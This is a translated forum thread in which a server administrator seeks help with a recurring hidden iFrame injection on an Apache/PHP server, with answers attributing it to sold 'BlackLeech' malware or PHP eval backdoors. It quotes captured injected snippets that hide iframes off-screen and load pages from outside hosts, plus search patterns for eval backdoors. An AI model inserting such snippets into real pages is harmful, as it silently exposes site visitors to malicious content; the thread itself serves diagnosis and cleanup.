几个月前,一个隐藏的iFrame开始出现在我们专用服务器上每个站点的每个页面上。当我们用 503 关闭站点进行维护时,iFrame 仍然在停机维护页面上。最终,主机阻止了iFrame的来源,但我们从未找到后门。注入的 iFrame 看起来像这样,但包装在一个样式标签中以混淆并带有各种 URL:
iframe src="http://heusnsy.nl/32283947.html..
我们将较小的网站移到了不同的主机,他们一直很好。
我们将主站点移动到同一主机上的新专用服务器上,尽管我们努力锁定服务器 - 防火墙,限制访问,软件更新,检查每个文件 - iFrame返回。
我们已经到处寻找它是如何进入的 - 配置文件,htaccess - 但找不到它。
知道隐藏的iFrame注入漏洞可能在哪里吗?
编辑:以下是更多详细信息:运行Apache和PHP的Linux机器。一切的最新版本。注入的代码如下所示:
<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..
更新:以下是更多信息和我们学到的内容:
主机: Station CentOS Linux 6.3 -Linux 2.6.32-279.5.1.el6.x86_64 on x86_64/Apache 版本 2.2.15 - PHP 5.3.3 (cli) (构建时间: Jul 3 2012 16:53:21)
服务器本身不会受到损害。
包括(apache/php)在内的所有服务都升级到我们系统可用的最新版本。
没有帐户(ftp 或其他)遭到入侵。
恶意软件在多个受感染的站点上同时更改其目标 URL (iframe src=)。(由 unmaskparasites.com 提供)
在更改 src 目标期间,没有执行/运行恶意或隐藏进程。
TCPDUMP 在离开端口 80 tcp 的同时获取了恶意软件的代码,但在接收恶意软件的用户的 GET 请求中没有发现任何奇怪之处 - 在相应的 apache 访问日志中也没有发现任何奇怪之处。
网站文件或httpd/php二进制文件在iFrame的src url地址切换期间没有以任何方式更改 - 由md5sum检查提供。
更改期间,已知服务的已知端口上未建立恶意连接。防火墙负责其余的工作。
Rkhunter和Maldet没有得出任何结果。
恶意软件 iFrame 在此服务器上的所有帐户和网站上具有此标签的任何页面上的第一个
"</script>"标签之后立即触发和注入。恶意软件被注入到静态页面和没有数据库连接的站点上。(页面有
<head> </script></head>标签就足够了)没有安装流氓 apache 模块或 php 模块(不包括 mycript.so)。大多数默认的 apache 模块都被挂起并注释掉了。
恶意软件并非始终存在。它来来去去,有时它会关闭几个小时,然后出现在几个用户面前,然后再次出去。使其极难追踪。
我们网站上运行的100%的PHP代码和大多数JavaScript代码(PHPMYadmin除外)都是自定义编码的。唯一不是的是Jquery库。
服务器是高流量机器,在日志中搜索/匹配速度极慢。每周访问日志可以超过 15GB。
情况就是这样...这不再是帐户受损、文件被黑客入侵、流氓脚本的问题。这是迄今为止我们所看到的任何东西,原因隐藏在apache/php本身的某个地方。(至少我们是这么想的)。任何帮助或想法都非常感谢。
以下是 iFrame 注入的示例:
<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </ style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >
</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div>
document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin
</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>
<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>
检查一下...劫持你服务器的程序的不法作者被称为"Left4Dead" - 他的iframe注入doo-hicky被称为"BlackLeech"。 你可以在Damagelab .org(犯罪论坛!!)上找到这位先生和他的广告。
每次root登录时,恶意软件都会停止所有活动,或者如果您通过SSH连接到服务器。 它还监视系统监视工具:|
Damagelab .org 廣告的屏幕截图:
http://imgur.com/NRQQl
作者的恶意软件广告文本:
http://pastebin.com/u7AcYSNi
请注意您的线程是如何作为引用:))列出的
如果您需要翻译方面的帮助,请打我!
我将初始感染源大致分为两组:(1)您的网站因某些漏洞而受到损害(如果您使用的是Wordpress或Joomla等开源引擎,则应检查当前的漏洞,可以从 exploit-db.com 开始)(2) 您网站的 CMS 是使用弱凭据访问的(正如您问题的评论中已经指出的那样)
代码的重新出现表明,感染源仍然存在。通常它是一个PHP脚本,它接收一个字符串作为参数(可能以base64或其他方式编码),解码并使用eval执行它。我猜你没有更改域名,所以坏人在他的机器上有一些脚本,定期请求他的"backdor"并重新感染你的系统。
你如何找到这个脚本?您的选择:
-
请参阅访问日志。查找可疑字符串,例如 .php?e=asSdfdSsafas== 或对不属于您站点的脚本的 POST 请求。
-
使用字符串搜索扫描所有文件,查找"eval($_POST['"或"eval($_GET['"或只是"eval",然后找到不太可能成为站点引擎一部分的文件。
希望这会有所帮助Bests
几天前,我遇到了一个事件,一些横幅填充了我管理的网站。终于我可以摆脱它了。您可以在此处查看完整答案。
问题是javascript代码被附加到文本区域。可能是浏览器被感染并附加了导致 iframe 加载的不需要的额外代码。
您的情况有所不同,但也许它会有所帮助:如果您正在使用所见即所得编辑器来处理后端的内容,或者其他人正在这样做,则 iframe 有可能是由附加到文本区域或输入的 javascript 创建的。
一种不同的方法。希望对您有所帮助!